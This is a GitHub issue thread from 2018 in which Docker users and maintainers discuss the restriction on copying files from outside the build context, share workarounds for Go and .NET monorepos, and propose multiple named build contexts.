Writing Dockerfiles for your project doesn't sound like "getting started" to me. It requires quite advanced knowledge. The getting-started tutorial describes setting up a very simple project that doesn't require any prior knowledge. But if you need to set up anything more complex, you must know how Docker works. And yes, that requires quite a lot of time to figure out.

Vanuan picture Vanuan  ·  3 Jan 2018
0

When something exists but you are not permitted access to it, it is _forbidden_. If it's not valid for some other reason, it's invalid for that other reason.

Writing Dockerfiles for your project doesn't sound "get started" to me

I started with the one that is created when adding docker support to a VS project. It would run in a debugger, but that isn't very useful if I need to make a deployable image. Trying to use the CLI to build the image outside of VS just reports the temp folder error. The file looks correct ...

FROM microsoft/aspnet:4.7
ARG source
WORKDIR /inetpub/wwwroot
COPY ${source:-obj/Docker/publish} .
PS C:\WINDOWS\system32> docker build C:\Users\astanton\source\repos\WebApplication3

"Docker, build using this folder and the docker file in it." seems to be what the CLI help tells me this means. Nothing about a build context or additional paths, just the one path to direct it to, be it a filesystem path, or a URL, or a "-" (the dash must be a *nix convention). The command looks correct...

Both the command and the dockerfile look correct, yet it does not work.

StingyJack picture StingyJack  ·  9 Jan 2018
0

Nothing about a build context or additional paths

In Unix, --help usually means "short help". If you need extended info you should use man:
https://unix.stackexchange.com/questions/86571/command-help-vs-man-command

I don't see how this problem you have is related to "Forbidden path" issue.

The error message tells you that there's no folder named obj\Docker\publish in C:\Users\astanton\source\repos\WebApplication3\. Where do you see "Forbidden path"?

Vanuan picture Vanuan  ·  9 Jan 2018
0

I don't see how this problem you have is related to "Forbidden path" issue.
You are applying the word with an incorrect meaning. I don't mean offense; I can only speak one language and you clearly can communicate in more than one. Personally, I would rather be corrected than continue to speak incorrectly.

if --help is the short help (that goes on for a few screens worth of console), then what is -h ?

That usage example says run the executable "docker" with command (option) "build" and give it a path. And then says "build an image from a docker file". So the path must be to the docker file, yes? If there are other params required it should say that, not make me look up "man pages".

I still don't understand why it's choosing to use the temp folder and then complaining about it, when I gave the path to the Dockerfile as the parameter and that has a relative path in it.

StingyJack picture StingyJack  ·  10 Jan 2018
0
$ docker build --help
Usage:  docker build [OPTIONS] PATH | URL | -
Build an image from a Dockerfile
Options:
...
-f, --file string                Name of the Dockerfile (Default is 'PATH/Dockerfile')

PATH points to your build context, which must include all the content you want to access in your build. The default Dockerfile is PATH/Dockerfile, but you can override that with -f.

Your PATH needs to contain an obj/Docker/publish directory, by the look of it.
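
So in this case something like the following should work, assuming the published output actually exists under the project folder (the publish path here is only an illustration):

# either publish to obj/Docker/publish first so the Dockerfile's default resolves,
# or point the build-arg at wherever the published output actually lives
docker build --build-arg source=bin/Release/Publish -t webapplication3 C:\Users\astanton\source\repos\WebApplication3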

javabrett picture javabrett  ·  10 Jan 2018
0

I still don't understand why it's choosing to use the temp folder and then complaining about it, when I gave the path to the Dockerfile as the parameter and that has a relative path in it.

It doesn't have to use the temp folder; that's just an implementation detail. What really happens is that it performs a remote build. I.e. while physically it's just a different location on the same machine, logically docker build doesn't build on your local machine, it builds on the remote machine. So you must provide all the files the build needs inside the directory or tarball specified by PATH or URL, so that those files are copied to the remote machine and used to produce an image. This approach is called a client/server architecture.
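
This is easy to see when the daemon really is remote, e.g. (the hostname here is made up):

# the client tars up the PATH argument and ships it to whatever daemon DOCKER_HOST points at
DOCKER_HOST=tcp://build-server.example.com:2375 docker build -t my-image .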

if --help is the short help (that goes on for a few screens worth of console), then what is -h ?

That is also a Unix convention: https://unix.stackexchange.com/a/6974
CLI flags that are composed of one letter are specified using a single minus (-h). They usually have an expanded version that has an identical meaning but is longer to type (--help). I.e. both -h and --help should produce the same output.

says "build an image from a docker file". So the path must be to the docker file, yes? If there are other params required it should say that, not make me look up "man pages".

This sounds like a valid point.
Please create a new issue if you want the docker build --help to be changed to be more descriptive.

Vanuan picture Vanuan  ·  10 Jan 2018
0

I hit this all the time with Go projects, where it is common for packages to live at the root of the project and not in the buildable command directory (where I want the Dockerfile to live).

project/ 
    pkg/
        utilities/
            utils.go
    cmd/
        binary-name/
            main.go
            Dockerfile

I can't build the Dockerfile and use the newest version of the utilities dir if I build from the binary-name directory.

I could of course run go get in my Dockerfile, but often times I want to use the local (modified) versions of my packages that are not yet published upstream.

Here are the workarounds I've come up with (some seen in this issue):

Move Dockerfiles to project root
Move your Dockerfile to the root of your project and refactor it to add files and directories from the project root path onward (ADD ./pkg /go/src/github.com/integrii/project/pkg).

  • Cons: Some people have huge projects and Docker uploads the entire "context" its running in to whatever the building server is, which is sometimes a remote server over VPN. This is too slow for some people.

Make a temporary dir for outside dependencies
Create a Makefile in your binary-name directory that copies outside dependencies into a temporary directory, then calls docker build. Refactor your Dockerfile to add files from the temporary directory created by your Makefile when building. Then have the Makefile call a clean step that deletes the temporary directory (see the sketch after this list).

  • Cons: Your Makefile may break, leaving garbage duplicated files around. You can make this less of an issue by adding the temporary directory to a .gitignore file.

Run Dockerfiles from root context
Run your Dockerfile from the project root "context", but let it keep living in the binary-name dir (docker build -f cmd/binary-name/Dockerfile .). Refactor the Dockerfile to add files relative to the root of the project.

  • Cons: Still does not work with huge repos, which end up shipping the entire project to a remote docker server in some environments.
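
A rough sketch of the "temporary dir" workaround above as a plain shell script (all paths and names are made up):

set -e
mkdir -p .deps                   # temporary dir, also listed in .gitignore
cp -r ../../pkg .deps/pkg        # copy the outside dependency into the build context
docker build -t binary-name .    # the Dockerfile ADDs from .deps/...
rm -rf .deps                     # clean up; if this fails you're left with harmless garbage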
integrii picture integrii  ·  15 Jan 2018
4

@integrii
Read the recommended option above: do not use a Dockerfile for development. Use a Go base image + docker-compose + mounted folders.

Vanuan picture Vanuan  ·  15 Jan 2018
0

After 153 comments I would have figured this would be understood as a basic, needed feature... Using ASP.NET, the build is based off a directory. If you're recommending that I have separate csprojects just for a docker build, that is crazy. The official dotnet-core-architecture example shows building outside of docker, then just copying the built contents into a docker container... that can't seriously be considered the way of doing this. Our directory is almost 800 MB; I'm not sending that much for each project that needs to build.

Please, just give us this basic feature.

Dispersia picture Dispersia  ·  14 Feb 2018
0

@Dispersia A lot of people confuse docker build and the Dockerfile with build scripts. The Dockerfile was never intended to be a general-purpose build tool.

Though you can use a Dockerfile this way, you're on your own with its caveats.

Yes, if you want a production image, you should run a container to build your artifacts and then copy those build artifacts to the place where the Dockerfile is located, or change the context to the directory with your build artifacts.

Vanuan picture Vanuan  ·  14 Feb 2018
0

See it this way: a Dockerfile is a set of instructions to copy your _runtime_ files into an empty docker image.

Vanuan picture Vanuan  ·  14 Feb 2018
0

@Vanuan that's the point of multi-stage builds, correct? If project B references project A, project B won't build, because it expects a csproj reference to the project, not a dll reference. Even if you get the artifacts of project A, it won't build unless you make a separate csproj that references the compiled dll instead of the source. And yeah, I am confused about what you mean by "docker build vs Dockerfile with build scripts". docker build is for the Dockerfile, correct? If not, I don't feel that should be the description at the top of the Docker Build page :P

Dispersia picture Dispersia  ·  14 Feb 2018
0

So you're saying you're using csproj files to build multiple projects simultaneously? In that case you need access to all the source files, which is 800 MB in your case. I don't see what you expect. You either build them inside or outside a container. In either case you'll end up with dll and exe files, which you then put into an image.

Vanuan picture Vanuan  ·  14 Feb 2018
0

Structure:

  • Libraries
    --- Library 1
    --- Library 2
    --- Library 3
  • APIs
    --- API 1 - reference library 1
    --- API 2 - references library 2 and library 3

If I request API 1 to be built, I do NOT need to send Library 2, Library 3, and API 2. I ONLY need Library 1 and API 1.

This is a C# project reference:
<ProjectReference Include="..\..\..\BuildingBlocks\EventBus\EventBusRabbitMQ\EventBusRabbitMQ.csproj" />

Your Options:

A. Change project references to local dlls, destroying all IntelliSense for every library

B. Hot-swap project references to build against dlls as needed for each individual docker build (hundreds of hot swaps, sounds fun)

C. Send 800 MB per build, when only 2 of those projects are actually needed

D. Don't use Docker for anything build related, one of the main reasons I want to move to docker (remove dependency on developer machine, one might use mac with .net core 1.1 installed, one might have 2.0 installed on windows, etc).

E. Fix Docker and make everyone happy.

Dispersia picture Dispersia  ·  14 Feb 2018
8

The daemon still needs to have all files sent. Some options that have been discussed:

  • Allow specifying a --ignore-file so that multiple Dockerfiles can use the same build-context, but different paths can be ignored for each Dockerfile (https://github.com/moby/moby/issues/12886)
  • The reverse: allow specifying multiple build-contexts to be sent, e.g.
docker build \
  --context lib1:/path/to/library-1 \
  --context lib2:/path/to/library-2 \
  --context api1:/path/to/api1 \
  .

Inside the Dockerfile, those paths could be accessible through (e.g.) COPY --from context:lib1

thaJeztah picture thaJeztah  ·  14 Feb 2018
0

Yes, I was going down the line of multiple build contexts. That looks beautiful and I would love that feature! I didn't see it portrayed quite that way before, but that looks great to me at least. I could just manage my own paths.

Dispersia picture Dispersia  ·  14 Feb 2018
0

@Dispersia

Don't use Docker for anything build related

I didn't say that. I said "don't use the Dockerfile for anything build related". You can perfectly well use Docker for builds:

# docker-compose.yml
version: '3'
services:
  api1:
    image: microsoft/aspnetcore-build:2.0
    volumes:
      - ./src:/src
    working_dir: /src/api1
    command: bash -c "dotnet restore && dotnet publish -c Release -o out"
  api2:
    image: microsoft/aspnetcore-build:2.0
    volumes:
      - ./src:/src
    working_dir: /src/api2
    command: bash -c "dotnet restore && dotnet publish -c Release -o out"

docker-compose run api1
docker-compose run api2

Vanuan picture Vanuan  ·  14 Feb 2018
0

@thaJeztah Multiple build context sounds exactly what I am looking for! How soon can we see this feature?

rulai-huajunzeng picture rulai-huajunzeng  ·  14 Feb 2018
0

So far it has just been a possible approach that was discussed; it would need a more thorough design, and also to be looked at in light of future integration with https://github.com/moby/buildkit (which has tons of improvements over the current builder, so possibly has other approaches/solutions for this problem).

I can open a separate issue for the proposal for discussion; once a design/feature has been decided on, contributions are definitely welcome.

thaJeztah picture thaJeztah  ·  14 Feb 2018
0

For .NET I resolved this with a workaround...
I created a docker-compose file for the build, and the original docker-compose generates the image for production.

See:
https://github.com/taigosantos/dotnet-core-poc/tree/master/docker/dotnet-docker

tfsantosbr picture tfsantosbr  ·  5 Apr 2018
0

I just encountered this issue. I have multiple Dockerfiles and a docker-compose file housed in one repo that fires everything up. I've been using an nginx container to proxy my client-side code to the backend, but I am now trying to dockerize the webpack configuration so that it will copy over the code and watch for changes. I've run into this forbidden-path issue, since my COPY command has to reach into a sibling directory.

defields923 picture defields923  ·  11 May 2018
8

Opened https://github.com/moby/moby/issues/37129 with a proposal for multiple build-contexts

thaJeztah picture thaJeztah  ·  23 May 2018